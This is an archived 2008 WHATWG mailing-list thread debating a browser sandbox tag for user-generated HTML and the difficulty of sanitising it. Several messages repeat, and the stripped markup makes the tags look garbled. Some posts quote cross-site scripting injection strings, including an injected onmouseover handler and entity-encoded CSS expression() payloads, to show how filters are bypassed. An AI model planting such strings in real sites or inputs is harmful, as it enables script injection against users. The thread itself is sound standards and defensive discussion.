 calculates its own height and sends a message to the parent page with the
 info.  In older browsers, just set the height to a reasonable minimum and
 let the user scroll.  Sure, it's not perfect, but it's called graceul
 degradation.

Much more difficult to implement than a sandbox/sandbox mechanism
- and I do not see the point giving more work to web developers when
it could be fixed so easily.

 3: If you have a page that lists 60 comments on a blog, then the user
 agent would have to contact the server 60 times to fetch each comment.
 This again means that perl/php scripts have to be invoked 60 times for
 one page view - that is 61 separate database connections and session
 initializations.
 You could always concatenate all of the comments into a single file,
 reducing it down to 1 request.

No you could not, if you for example want people to report comments or
give them votes - which in the Web 2.0 world requires scripting.

 4: For the fallback method of using src= for HTML 4 browsers to
 actually work, the fallback documents must be hosted on a separate
 domain name. This again means that a website using HTTPS must purchase
 and maintain two certificates.
 I don't see that as a show stopper.

Well, I am not going to argue anymore. I have not heard anybody talk
in favour of a sandbox mechanism here or contributing something
constructive. Only feedback has been that you could do it with
iframes, and if it looks ugly with HTML 4 browsers, then that is only
graceful degradation, so it is okay. Maybe the future is Flash and
Silverlight afterall. We'll see.

 If HTML 5 browsers require everything between htmlarea/htmlarea to
 be html entity escaped, that is  and  must be replaced with lt; and
 gt; respectively. If this is not done, HTML 5 browsers will issue a
 severe warning and refuse to display the page. Developers will quickly
 learn.

 Draconian error handling is something we really want to avoid, particularly
 when the such an error can be triggered by failing to handle user generated
 content properly.

I see that argument. Maybe you have a suggestion to what should happen
if unescaped HTML is encountered then?

 HTML 4 browsers will never run scripts (since it will only see plain
 text). HTML 5 browsers will display rich text. It would be completely
 secure for both HTML 4 and HTML 5 browsers.

 A simple Javascript could clean up the HTML markup for HTML 4 

Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Kristof Zelechovski
The problem with tag warning is, if /data is the first token inserted,
there will be no warning because the resulting code will be valid.  So the
key question remains: how do you tell unescaped /data from the closing
/data?  And the warning, if applicable, will go to the wrong person: to
all readers instead of just one writer.
What is invalid about img alt= src=next.png?
It is not enough to scratch some JavaScript that will look all right and
correctly sift out plain text for some test cases; you would have to prove
that it does the right thing in all cases.
Contrary to what you say, MediaWiki sanitizes HTML.  You can contribute to
Wikipedia without using their templates; the templates are there just to
make contributing easier.
It should be possible to keep all contributed content in one file with units
identified as document fragments.  You still have one request per one unit
but all of them request the same data file.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Frode Borli
Sent: Wednesday, June 18, 2008 12:12 AM
To: Lachlan Hunt
Cc: whatwg@lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

 I have been reading up on past discussions on sandboxing content, and
 I feel that it is generally agreed on that there should be some
 mechanism for marking content as user generated. The discussion
 mainly appears to be focused on implementation. Please read my
 implementation notes at the end of this message on how we can include
 this function safely for both HTML 4 and HTML 5 browsers, and still
 allow HTML 4 browsers to function properly.

 My main arguments for having this feature (in one form or another) in
 the browser is:

 - It is future proof. Changes to browsers (for example adding
 expression support to css) will never again require old sanitizers to
 be updated.

 If the sanitiser uses a whitelist based approach that forbids everything
by
 default, and then only allows known elements and attributes; and in the
case
 of the style attribute, known properties and values that are safe, then
that
 would also be the case.

I have written a sanitizer for html and it is very difficult -
especially since browsers have undocumented bugs in their parsing.

Example: div colspan=amp;
style=font-family#61;expression#40;alert#40quot;hackedquot#41#41
colspan=amp;Red/div

The proof that sanitazing HTML is difficult is the fact that no major
site even attempts it. Even wikipedia use some obscure wiki-language,
instead of implementing a wysiwyg editor.

[snip]

 2: The use of src= yields problems with iframe heights (since the
 src-url must be hosted on another server javascript cannot fix this)
 and HTML 4 browsers have no other method of adjusting the iframe
 height according to the content.
 In recent browsers that support cross-document messaging (Opera 9, Safari
3,
 Firefox 3 and IE 8), you could include a script within the comment page
that
 calculates its own height and sends a message to the parent page with the
 info.  In older browsers, just set the height to a reasonable minimum and
 let the user scroll.  Sure, it's not perfect, but it's called graceul
 degradation.

Much more difficult to implement than a sandbox/sandbox mechanism
- and I do not see the point giving more work to web developers when
it could be fixed so easily.

 3: If you have a page that lists 60 comments on a blog, then the user
 agent would have to contact the server 60 times to fetch each comment.
 This again means that perl/php scripts have to be invoked 60 times for
 one page view - that is 61 separate database connections and session
 initializations.
 You could always concatenate all of the comments into a single file,
 reducing it down to 1 request.

No you could not, if you for example want people to report comments or
give them votes - which in the Web 2.0 world requires scripting.

[snip]

 If HTML 5 browsers require everything between htmlarea/htmlarea to
 be html entity escaped, that is  and  must be replaced with lt; and
 gt; respectively. If this is not done, HTML 5 browsers will issue a
 severe warning and refuse to display the page. Developers will quickly
 learn.

 Draconian error handling is something we really want to avoid,
particularly
 when the such an error can be triggered by failing to handle user
generated
 content properly.

I see that argument. Maybe you have a suggestion to what should happen
if unescaped HTML is encountered then?

 HTML 4 browsers will never run scripts (since it will only see plain
 text). HTML 5 browsers will display rich text. It would be completely
 secure for both HTML 4 and HTML 5 browsers.

 A simple Javascript could clean up the HTML markup for HTML 4 browsers..

 In a separate mail, you wrote:
 data
 lt;user supplied inputgt;
 /data

 Then this will be secure both for HTML 4 and HTML 5 browsers. HTML 4
 browsers will display html, while HTML 5 browsers will display
 correctly formatted code. A simple

[whatwg] Sandboxing to accommodate user generated content.

2008-06-16 Thread Frode Børli
Hi! I am a new member of this mailing list, and I wish to contribute with a
couple of specific requirements that I believe should be discussed and
perhaps implemented in the final specification. I am unsure if this is the
correct place to post my ideas (or if my ideas are even new), but if it is
not, then I am sure somebody will instruct me. :) One person told me that
the specification was finished and no new features would be added from now
on - but hopefully that is not true.


The challenge:

More and more websites have features where users can contribute with user
generated content - often in the form of audio, video, images
or wiki-articles. An older type of content contribution is normal text such
as posts in a discussion forum, a mailing list such as this and comments on
blog articles.

A major challenge for many web developers is validating untrusted content
such as the message body of a blog comment. Unless the developer has a
flawless and future proof algorithm for ensuring that the message body does
not contain any script, web developers have to resort to text only - or
bbCode-style markup languages to allow users to post text content with
richer formatting. If the developer wants to enable rich formatting using
bbCode, it also needs fairly advanced methods of ensuring that no scripts
are executed. Consider this bbCode example:
[img]some_image.jpg'onmouseover=maliciousScript()[/img]. The bbCode parser
must ensure that there is absolutely no method of injecting scripts in user
posts - and that is very difficult when at the same time there exists
parsing errors in browsers. The example could easily be validating by not
allowing apostrophes or quotation marks in urls - but then we have multiple
entities that could be used: apos; or #39;. To make matters worse, some
browsers parse #39 which is an incomplete html entity and all these
variations must be considered by the bbCode parser author.

Another problem which makes future proofing this type of security is that
standards evolve. A few years ago you could safely allow users to apply
css-styles to tags. Example bbCode tag [color=blue]Blue text[/color] would
be translated to span style='color: blue'Blue text/span. In this example
an exploit could be [color=expression(maliciousCode())]Text[/color]. When
the algorithm was made, it was considered secure, since no script could ever
be executed inside a style attribute. With the invention of expressions and
behaviours etc the knowledge required by web developers are ever increasing,
and web developers have to review all old code whenever new technologies
emerge - because what once was secure suddenly is not secure anymore.


One solution:

htmlareaUser generated content/htmlarea


No scripts would ever be allowed to be executed inside this tag. Malicious
users could potentially submit /htmlarea unsafe content htmlarea and
get around this. There are as I can see it two solutions to this:

User generated content inside the tag must be escaped using html entities
(but still rendered as html by the user agent), or the author must prevent
users from submitting the string /htmlarea and all possible variations
of the tag.

If the first solution is used, then browsers should display a
strong security warning if unescaped content is seen between htmlarea-tags
on a website (to educated web developers).


A sidenote: The tag name I chose is based on the textarea-tags which
should also be entity escaped to prevent users from inserting the text
/textarea.  This currently breaks a lot of web pages - so perhaps a strong
security warning is in place if unescaped content is found after the
textarea start tag also?


-- 
Best regards / Med vennlig hilsen
Frode Børli
Seria.no

Mobile:
+47 406 16 637
Company:
+47 216 90 000
Fax:
+47 216 91 000


Think about the environment. Do not print this e-mail unless you really need
to.

Tenk miljø. Ikke skriv ut denne e-posten dersom det ikke er nødvendig.


[whatwg] Sandboxing to accommodate user generated content.

2008-06-16 Thread Frode Børli
 Hi! I am a new member of this mailing list, and I wish to contribute with a
couple of specific requirements that I believe should be discussed and
perhaps implemented in the final specification. I am unsure if this is the
correct place to post my ideas (or if my ideas are even new), but if it is
not, then I am sure somebody will instruct me. :) One person told me that
the specification was finished and no new features would be added from now
on - but hopefully that is not true.


The challenge:

More and more websites have features where users can contribute with user
generated content - often in the form of audio, video, images
or wiki-articles. An older type of content contribution is normal text such
as posts in a discussion forum, a mailing list such as this and comments on
blog articles.

A major challenge for many web developers is validating untrusted content
such as the message body of a blog comment. Unless the developer has a
flawless and future proof algorithm for ensuring that the message body does
not contain any script, web developers have to resort to text only - or
bbCode-style markup languages to allow users to post text content with
richer formatting. If the developer wants to enable rich formatting using
bbCode, it also needs fairly advanced methods of ensuring that no scripts
are executed. Consider this bbCode example:
[img]some_image.jpg'onmouseover=maliciousScript()[/img]. The bbCode parser
must ensure that there is absolutely no method of injecting scripts in user
posts - and that is very difficult when at the same time there exists
parsing errors in browsers. The example could easily be validating by not
allowing apostrophes or quotation marks in urls - but then we have multiple
entities that could be used: apos; or #39;. To make matters worse, some
browsers parse #39 which is an incomplete html entity and all these
variations must be considered by the bbCode parser author.

Another problem which makes future proofing this type of security is that
standards evolve. A few years ago you could safely allow users to apply
css-styles to tags. Example bbCode tag [color=blue]Blue text[/color] would
be translated to span style='color: blue'Blue text/span. In this example
an exploit could be [color=expression(maliciousCode())]Text[/color]. When
the algorithm was made, it was considered secure, since no script could ever
be executed inside a style attribute. With the invention of expressions and
behaviours etc the knowledge required by web developers are ever increasing,
and web developers have to review all old code whenever new technologies
emerge - because what once was secure suddenly is not secure anymore.


One solution:

htmlareaUser generated content/htmlarea


No scripts would ever be allowed to be executed inside this tag. Malicious
users could potentially submit /htmlarea unsafe content htmlarea and
get around this. There are as I can see it two solutions to this:

User generated content inside the tag must be escaped using html entities
(but still rendered as html by the user agent), or the author must prevent
users from submitting the string /htmlarea and all possible variations
of the tag.

If the first solution is used, then browsers should display a
strong security warning if unescaped content is seen between htmlarea-tags
on a website (to educated web developers).


A sidenote: The tag name I chose is based on the textarea-tags which
should also be entity escaped to prevent users from inserting the text
/textarea.  This currently breaks a lot of web pages - so perhaps a strong
security warning is in place if unescaped content is found after the
textarea start tag also?


-- 
Best regards / Med vennlig hilsen
Frode Børli
Seria.no

Mobile:
+47 406 16 637
Company:
+47 216 90 000
Fax:
+47 216 91 000


Think about the environment. Do not print this e-mail unless you really need
to.

Tenk miljø. Ikke skriv ut denne e-posten dersom det ikke er nødvendig.



-- 
Best regards / Med vennlig hilsen
Frode Børli
Seria.no

Mobile:
+47 406 16 637
Company:
+47 216 90 000
Fax:
+47 216 91 000


Think about the environment. Do not print this e-mail unless you really need
to.

Tenk miljø. Ikke skriv ut denne e-posten dersom det ikke er nødvendig.